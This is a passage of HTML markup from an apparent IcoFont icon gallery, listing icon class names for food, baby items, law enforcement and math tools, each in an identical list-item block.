				<span> muscle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-apple"></i>
				</div> 
				<span> apple </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-arabian-coffee"></i>
				</div> 
				<span> arabian-coffee </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-artichoke"></i>
				</div> 
				<span> artichoke </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-asparagus"></i>
				</div> 
				<span> asparagus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-avocado"></i>
				</div> 
				<span> avocado </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baby-food"></i>
				</div> 
				<span> baby-food </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-banana"></i>
				</div> 
				<span> banana </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bbq"></i>
				</div> 
				<span> bbq </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beans"></i>
				</div> 
				<span> beans </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beer"></i>
				</div> 
				<span> beer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bell-pepper-capsicum"></i>
				</div> 
				<span> bell-pepper-capsicum </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-birthday-cake"></i>
				</div> 
				<span> birthday-cake </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bread"></i>
				</div> 
				<span> bread </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-broccoli"></i>
				</div> 
				<span> broccoli </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-burger"></i>
				</div> 
				<span> burger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cabbage"></i>
				</div> 
				<span> cabbage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-carrot"></i>
				</div> 
				<span> carrot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cauli-flower"></i>
				</div> 
				<span> cauli-flower </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cheese"></i>
				</div> 
				<span> cheese </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chef"></i>
				</div> 
				<span> chef </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cherry"></i>
				</div> 
				<span> cherry </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chicken-fry"></i>
				</div> 
				<span> chicken-fry </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chicken"></i>
				</div> 
				<span> chicken </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cocktail"></i>
				</div> 
				<span> cocktail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coconut-water"></i>
				</div> 
				<span> coconut-water </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coconut"></i>
				</div> 
				<span> coconut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coffee-alt"></i>
				</div> 
				<span> coffee-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coffee-cup"></i>
				</div> 
				<span> coffee-cup </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coffee-mug"></i>
				</div> 
				<span> coffee-mug </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coffee-pot"></i>
				</div> 
				<span> coffee-pot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cola"></i>
				</div> 
				<span> cola </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-corn"></i>
				</div> 
				<span> corn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-croissant"></i>
				</div> 
				<span> croissant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crop-plant"></i>
				</div> 
				<span> crop-plant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cucumber"></i>
				</div> 
				<span> cucumber </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-culinary"></i>
				</div> 
				<span> culinary </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cup-cake"></i>
				</div> 
				<span> cup-cake </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dining-table"></i>
				</div> 
				<span> dining-table </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-donut"></i>
				</div> 
				<span> donut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-egg-plant"></i>
				</div> 
				<span> egg-plant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-egg-poached"></i>
				</div> 
				<span> egg-poached </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-farmer-alt"></i>
				</div> 
				<span> farmer-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-farmer"></i>
				</div> 
				<span> farmer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fast-food"></i>
				</div> 
				<span> fast-food </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-food-basket"></i>
				</div> 
				<span> food-basket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-food-cart"></i>
				</div> 
				<span> food-cart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fork-and-knife"></i>
				</div> 
				<span> fork-and-knife </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-french-fries"></i>
				</div> 
				<span> french-fries </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fruits"></i>
				</div> 
				<span> fruits </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-grapes"></i>
				</div> 
				<span> grapes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-honey"></i>
				</div> 
				<span> honey </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hot-dog"></i>
				</div> 
				<span> hot-dog </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ice-cream-alt"></i>
				</div> 
				<span> ice-cream-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ice-cream"></i>
				</div> 
				<span> ice-cream </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-juice"></i>
				</div> 
				<span> juice </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ketchup"></i>
				</div> 
				<span> ketchup </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kiwi"></i>
				</div> 
				<span> kiwi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-layered-cake"></i>
				</div> 
				<span> layered-cake </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lemon-alt"></i>
				</div> 
				<span> lemon-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lemon"></i>
				</div> 
				<span> lemon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lobster"></i>
				</div> 
				<span> lobster </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mango"></i>
				</div> 
				<span> mango </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-milk"></i>
				</div> 
				<span> milk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mushroom"></i>
				</div> 
				<span> mushroom </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-noodles"></i>
				</div> 
				<span> noodles </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-onion"></i>
				</div> 
				<span> onion </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-orange"></i>
				</div> 
				<span> orange </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pear"></i>
				</div> 
				<span> pear </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peas"></i>
				</div> 
				<span> peas </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pepper"></i>
				</div> 
				<span> pepper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pie-alt"></i>
				</div> 
				<span> pie-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pie"></i>
				</div> 
				<span> pie </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pineapple"></i>
				</div> 
				<span> pineapple </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pizza-slice"></i>
				</div> 
				<span> pizza-slice </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pizza"></i>
				</div> 
				<span> pizza </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-plant"></i>
				</div> 
				<span> plant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-popcorn"></i>
				</div> 
				<span> popcorn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-potato"></i>
				</div> 
				<span> potato </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pumpkin"></i>
				</div> 
				<span> pumpkin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-raddish"></i>
				</div> 
				<span> raddish </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-restaurant-menu"></i>
				</div> 
				<span> restaurant-menu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-restaurant"></i>
				</div> 
				<span> restaurant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-salt-and-pepper"></i>
				</div> 
				<span> salt-and-pepper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sandwich"></i>
				</div> 
				<span> sandwich </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sausage"></i>
				</div> 
				<span> sausage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-soft-drinks"></i>
				</div> 
				<span> soft-drinks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-soup-bowl"></i>
				</div> 
				<span> soup-bowl </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spoon-and-fork"></i>
				</div> 
				<span> spoon-and-fork </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-steak"></i>
				</div> 
				<span> steak </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-strawberry"></i>
				</div> 
				<span> strawberry </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sub-sandwich"></i>
				</div> 
				<span> sub-sandwich </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sushi"></i>
				</div> 
				<span> sushi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taco"></i>
				</div> 
				<span> taco </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tea-pot"></i>
				</div> 
				<span> tea-pot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tea"></i>
				</div> 
				<span> tea </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tomato"></i>
				</div> 
				<span> tomato </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-watermelon"></i>
				</div> 
				<span> watermelon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wheat"></i>
				</div> 
				<span> wheat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baby-backpack"></i>
				</div> 
				<span> baby-backpack </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baby-cloth"></i>
				</div> 
				<span> baby-cloth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baby-milk-bottle"></i>
				</div> 
				<span> baby-milk-bottle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baby-trolley"></i>
				</div> 
				<span> baby-trolley </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baby"></i>
				</div> 
				<span> baby </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-candy"></i>
				</div> 
				<span> candy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-holding-hands"></i>
				</div> 
				<span> holding-hands </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-infant-nipple"></i>
				</div> 
				<span> infant-nipple </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kids-scooter"></i>
				</div> 
				<span> kids-scooter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-safety-pin"></i>
				</div> 
				<span> safety-pin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-teddy-bear"></i>
				</div> 
				<span> teddy-bear </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-ball"></i>
				</div> 
				<span> toy-ball </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-cat"></i>
				</div> 
				<span> toy-cat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-duck"></i>
				</div> 
				<span> toy-duck </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-elephant"></i>
				</div> 
				<span> toy-elephant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-hand"></i>
				</div> 
				<span> toy-hand </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-horse"></i>
				</div> 
				<span> toy-horse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-lattu"></i>
				</div> 
				<span> toy-lattu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toy-train"></i>
				</div> 
				<span> toy-train </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-burglar"></i>
				</div> 
				<span> burglar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cannon-firing"></i>
				</div> 
				<span> cannon-firing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cc-camera"></i>
				</div> 
				<span> cc-camera </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cop-badge"></i>
				</div> 
				<span> cop-badge </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cop"></i>
				</div> 
				<span> cop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-court-hammer"></i>
				</div> 
				<span> court-hammer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-court"></i>
				</div> 
				<span> court </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-finger-print"></i>
				</div> 
				<span> finger-print </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gavel"></i>
				</div> 
				<span> gavel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-handcuff-alt"></i>
				</div> 
				<span> handcuff-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-handcuff"></i>
				</div> 
				<span> handcuff </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-investigation"></i>
				</div> 
				<span> investigation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-investigator"></i>
				</div> 
				<span> investigator </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jail"></i>
				</div> 
				<span> jail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-judge"></i>
				</div> 
				<span> judge </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-alt-1"></i>
				</div> 
				<span> law-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-alt-2"></i>
				</div> 
				<span> law-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-alt-3"></i>
				</div> 
				<span> law-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-book"></i>
				</div> 
				<span> law-book </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-document"></i>
				</div> 
				<span> law-document </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-order"></i>
				</div> 
				<span> law-order </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-protect"></i>
				</div> 
				<span> law-protect </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law-scales"></i>
				</div> 
				<span> law-scales </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-law"></i>
				</div> 
				<span> law </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lawyer-alt-1"></i>
				</div> 
				<span> lawyer-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lawyer-alt-2"></i>
				</div> 
				<span> lawyer-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lawyer"></i>
				</div> 
				<span> lawyer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-legal"></i>
				</div> 
				<span> legal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pistol"></i>
				</div> 
				<span> pistol </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-badge"></i>
				</div> 
				<span> police-badge </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-cap"></i>
				</div> 
				<span> police-cap </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-car-alt-1"></i>
				</div> 
				<span> police-car-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-car-alt-2"></i>
				</div> 
				<span> police-car-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-car"></i>
				</div> 
				<span> police-car </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-hat"></i>
				</div> 
				<span> police-hat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police-van"></i>
				</div> 
				<span> police-van </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-police"></i>
				</div> 
				<span> police </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thief-alt"></i>
				</div> 
				<span> thief-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thief"></i>
				</div> 
				<span> thief </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-abacus-alt"></i>
				</div> 
				<span> abacus-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-abacus"></i>
				</div> 
				<span> abacus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-angle-180"></i>
				</div> 
				<span> angle-180 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-angle-45"></i>
				</div> 
				<span> angle-45 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-angle-90"></i>
				</div> 
				<span> angle-90 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-angle"></i>
				</div> 
				<span> angle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-calculator-alt-1"></i>
				</div> 
				<span> calculator-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-calculator-alt-2"></i>
				</div> 
				<span> calculator-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-calculator"></i>
				</div> 
				<span> calculator </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circle-ruler-alt"></i>
				</div> 
				<span> circle-ruler-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circle-ruler"></i>
				</div> 
				<span> circle-ruler </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-compass-alt-1"></i>
				</div> 
				<span> compass-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-compass-alt-2"></i>
				</div> 
				<span> compass-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-compass-alt-3"></i>
				</div> 
				<span> compass-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-compass-alt-4"></i>
				</div> 
				<span> compass-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golden-ratio"></i>
				</div> 
				<span> golden-ratio </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-marker-alt-1"></i>
				</div> 
				<span> marker-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-marker-alt-2"></i>
				</div> 
				<span> marker-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-marker-alt-3"></i>
				</div> 
				<span> marker-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-marker"></i>
				</div> 
				<span> marker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-math"></i>
				</div> 
				<span> math </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mathematical-alt-1"></i>
				</div> 
				<span> mathematical-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mathematical-alt-2"></i>
				</div> 
				<span> mathematical-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mathematical"></i>
				</div> 
				<span> mathematical </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-alt-1"></i>
				</div> 
				<span> pen-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-alt-2"></i>
				</div> 
				<span> pen-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-alt-3"></i>
				</div> 
				<span> pen-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-holder-alt-1"></i>
				</div> 
				<span> pen-holder-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-holder"></i>
				</div> 
				<span> pen-holder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen"></i>
				</div> 
				<span> pen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pencil-alt-1"></i>
				</div> 
				<span> pencil-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pencil-alt-2"></i>
				</div> 
				<span> pencil-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pencil-alt-3"></i>
				</div> 
				<span> pencil-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pencil-alt-4"></i>
				</div> 
				<span> pencil-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pencil"></i>
				</div> 
				<span> pencil </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-alt-1"></i>
				</div> 
				<span> ruler-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-alt-2"></i>
				</div> 
				<span> ruler-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-compass-alt"></i>
				</div> 
				<span> ruler-compass-alt </span>
